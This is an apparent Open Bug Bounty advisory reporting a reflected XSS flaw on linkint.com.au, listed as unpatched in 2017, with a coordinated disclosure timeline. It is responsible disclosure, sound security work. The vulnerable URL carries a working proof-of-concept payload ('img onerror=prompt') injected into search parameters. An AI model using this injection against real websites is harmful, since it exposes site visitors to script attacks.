linkint.com.au XSS vulnerability

2017-06-19T09:57:00
ID OBB:249920
Type openbugbounty
Reporter secuninja
Modified 2017-07-17T10:15:00

Description

Vulnerable URL:
http://www.linkint.com.au/search-results-s.html?webpage_id=1631&command=cman_view_webpage&pkey=linkint&webpage_id=1295&inp_profile_id=2&input_Keywords_2_4=%3E%27%3E%22%3Et%3Ci%3Ep%3Cimg%20src%3Dx%20onerror%3Dprompt(%2Fopenbugbounty%2F)%3E&input_Product_Starter_2_65=~~Keywords~~&input_H_Code_2_6=~~Keywords~~&input_H2_Code_2_11=~~Keywords~~&input_H2_Keywords_2_32=~~Keywords~~&input_H3_Keywords_2_35=~~Keywords~~&input_H4_Keywords_2_50=~~Keywords~~&input_H5_Keywords_2_53=~~Keywords~~&searchtype=advsch&searchword=%3E%27%3E%22%3Et%3Ci%3Ep%3Cimg%20src%3Dx%20onerror%3Dprompt(%2Fopenbugbounty%2F)%3E%20~~Keywords~~%20~~Keywords~~%20~~Keywords~~%20~~Keywords~~%20~~Keywords~~%20~~Keywords~~%20~~Keywords~~%20&inp_search_refer=Y

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 29.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1189992
VIP website status:| No
Check linkint.com.au SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 June, 2017 09:57 GMT
Generic security notifications sent to website owner| 19 June, 2017 10:00 GMT
Notification sent to subscribers (without technical details)| 19 June, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 17 July, 2017 10:15 GMT